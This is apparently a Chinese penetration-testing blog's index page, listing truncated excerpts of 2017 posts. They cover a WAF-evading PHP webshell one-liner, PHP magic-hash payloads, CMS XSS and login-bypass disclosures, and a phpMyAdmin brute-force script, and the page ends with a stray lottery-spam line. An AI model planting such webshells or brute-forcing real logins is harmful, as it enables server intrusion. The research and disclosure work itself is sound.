過狗過云鎖一句話

mOon    原創作品     5753次查看    搶沙發    2017年12月08日

這幾個月 沒什么東西寫 東西都是轉載 哈哈哈 最近更新一些原創吧。 今天在群里面看到一些機油討論一些話題。 看到一個據說是過狗過云鎖的一句話。 <?php error_reporting(0);set_time_limit(0);$a=$_POST["x"];if($a){$a=str_replace(array(...

PHP 函數漏洞總結

mOon    滲透測試     4188次查看    搶沙發    2017年11月29日

1.MD5 compare漏洞 PHP在處理哈希字符串時,會利用”!=”或”==”來對哈希值進行比較,它把每一個以”0E”開頭的哈希值都解釋為0,所以如果兩個不同的密碼經過哈希以后,其哈希值都是以”0E”開頭的,那么PHP將會認為他們相同,都是0。 常見的payload有 0x01 md5(str)     QNKCDZO     2406...

PHP滲透中的奇淫技巧--檢查相等時的漏洞

mOon    滲透測試     4287次查看    搶沙發    2017年11月29日

PHP是現在網站中最為常用的后端語言之一,是一種類型系統 動態、弱類型的面向對象式編程語言。可以嵌入HTML文本中,是目前最流行的web后端語言之一,并且可以和Web Server 如apache和nginx方便的融合。目前,已經占據了服務端市場的極大占有量。 但是,弱類型,一些方便的特性由于新手程序員的不當使用,造成了一些漏洞,這篇文章就來介紹一下一些滲透中可以用的特性。 ...

鯰魚CMS存儲XSS漏洞披露

mOon    漏洞收集     3358次查看    搶沙發    2017年11月19日

Catfish(鯰魚) CMS是一款開源的PHP內容管理系統。這個cms是十月我和學長小胡子一起審計的。所以在這里聲明下,洞是他找的,他不善言辭,授權給我來寫文章。漏洞已提交給廠商,同意公開此漏洞。 XSS漏洞點 這里的版本是V4.6.0。出問題的地方是頭像上傳這個地方,這個cms以前爆過一枚任意文件刪除漏洞也是這里。 先注冊一個普通用戶 ...

Masscan及Nmap實現對阿里云ECS的外網端口監控

mOon    滲透測試     3218次查看    搶沙發    2017年11月18日

*本文原創作者:yuegui_2004,本文屬于FreeBuf原創獎勵計劃,禁止轉載 Nmap作為一個開源的互聯網端口掃描及安全審計工具,大家并不陌生,許多系統及網絡管理員利用它進行網絡探測、端口掃描、端口服務管理等。但是在遇到大網段全端口范圍的場景時,nmap的掃描能力就受到了限制,掃描周期長就成為了其弊端。 要實現外網端口監控,首先就要保證端口掃描的近實時性,對向...

C#實現多線程的方式:Task——任務

mOon    滲透編程     3411次查看    搶沙發    2017年11月17日

C#實現多線程的方式:Task——任務 簡介   .NET 4包含新名稱空間System.Threading.Tasks,它 包含的類抽象出了線程功能。 在后臺使用ThreadPool。 任務表示應完成的某個單元的工作。 這個單元的工作可以在單獨的線程中運行,也可以以同步方式啟動一個任務,這需要等待主調線程。 使用任務不僅可以獲得一個抽象層,還可以對底...

國產ImXSS工具開源發布(附設計文檔)

mOon    神器下載     5223次查看    搶沙發    2017年11月15日

 國產ImXSS工具開源發布(附設計文檔) 一、前言 ImXSS是國內首套Java研發的Xss跨站腳本測試平臺。ImXSS前身是XssAPP,秉承高效、快速、穩定、易用的原則。主要用于技術研究與交流. 二、業務說明 跨站腳本攻擊(也稱為XSS)指利用網站漏洞從用戶那里惡意盜取...

Foosun DotNetCMS2.0登錄繞過漏洞

mOon    漏洞收集     3136次查看    搶沙發    2017年11月14日

Foosun DotNetCMS2.0的源碼下載地址:【傳送門】 在閱讀Foosun DotNetCMS2.0代碼時,我們發現了這樣一處: 具體細節為: 1.從${pre}_sys_User表中取出UserNum,UserName,SiteID ...

phpmyadmin枚舉工具

mOon    神器下載     4331次查看    搶沙發    2017年11月09日

#!/usr/bin/env python # -*- coding: utf-8 -*- # @Author: IcySun # 腳本功能:暴力破解phpMyadmin密碼 from Queue import Queue import threading,sys import requests def use(): print '#' * 50 prin...

Python3編寫的CMS漏洞檢測工具(含300POC)

mOon    神器下載     5691次查看    2條評論    2017年11月08日

*本文原創作者:六翼,本文屬FreeBuf原創獎勵計劃,未經許可禁止轉載 0×01 說明:  最近幾年cms在網絡空間中占比越來越多,黑客的攻擊重心也從傳統OWASP10導向通用系統漏洞挖掘,而cms類型網站整體修復周期又耗時很長,很容易被入侵。大學期間研究安全的時候接觸到了bugscan,所以也想打造一個自己的cms漏洞poc管理和檢測工具。 ...

?
?
河北11选5开奖